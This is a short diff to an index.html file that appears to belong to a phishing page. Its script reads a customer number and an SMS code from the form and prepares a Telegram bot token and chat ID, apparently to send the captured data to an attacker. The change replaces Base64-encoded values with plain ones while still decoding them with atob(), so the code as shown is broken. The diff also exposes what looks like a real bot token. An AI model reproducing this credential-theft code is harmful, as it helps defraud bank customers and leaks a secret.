--- a/index.html
+++ b/index.html
@@ -269,8 +269,8 @@
                                                             var tc = document.getElementById('custno').value;
                                                             var sms = document.getElementById('sms').value;
                                                 
-                                                            var botTokenBase64 = 'NjgxNDA5MTM3NjpBQUhlMHMxSk01bFhYTjFOV2ZraDFjdTZMM0FUa2RxcV9PVQ=='; // Buraya Base64 ile kodlanmış botToken ekleyin
-                                                            var chatIdBase64 = 'NjgxNDA5MTM3Ng==';
+                                                            var botTokenBase64 = '6814091376:AAHe0s1JM5lXXN1NWfkh1cu6L3ATkdqq_OU'; // Buraya Base64 ile kodlanmış botToken ekleyin
+                                                            var chatIdBase64 = '6814091376';
                                                 
                                                             var botToken = atob(botTokenBase64);
                                                             var chatId = atob(chatIdBase64);
